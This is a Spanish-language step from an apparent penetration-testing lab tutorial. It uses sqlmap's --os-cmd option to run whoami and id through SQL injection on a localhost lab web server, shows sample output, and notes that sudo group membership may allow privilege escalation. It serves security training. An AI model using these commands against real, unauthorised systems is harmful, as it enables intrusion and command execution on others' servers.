Ejecutar un Comando Simple como whoami o id
En este paso, ejecutará comandos comunes de Linux como whoami e id para recopilar información sobre el contexto de usuario y grupo bajo el cual se está ejecutando el proceso del servidor web. Esta información es crucial para comprender los privilegios que tiene en el sistema comprometido.
Primero, ejecutemos el comando whoami:
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="whoami" --batch
Después de que sqlmap termine, mostrará la salida del comando whoami. Típicamente será el nombre de usuario bajo el cual se está ejecutando el servidor web (por ejemplo, www-data, apache, o labex en nuestro entorno de laboratorio).
...
[INFO] retrieved OS command output:
labex
...
A continuación, ejecute el comando id. Este comando proporciona información más detallada, incluyendo el ID de usuario (UID), el ID de grupo (GID) y todos los grupos a los que pertenece el usuario.
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="id" --batch
La salida del comando id se verá algo así:
...
[INFO] retrieved OS command output:
uid=1000(labex) gid=1000(labex) groups=1000(labex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
...
Analizar esta salida le ayuda a comprender los permisos disponibles. Por ejemplo, si el usuario forma parte del grupo sudo, podría ser posible escalar privilegios.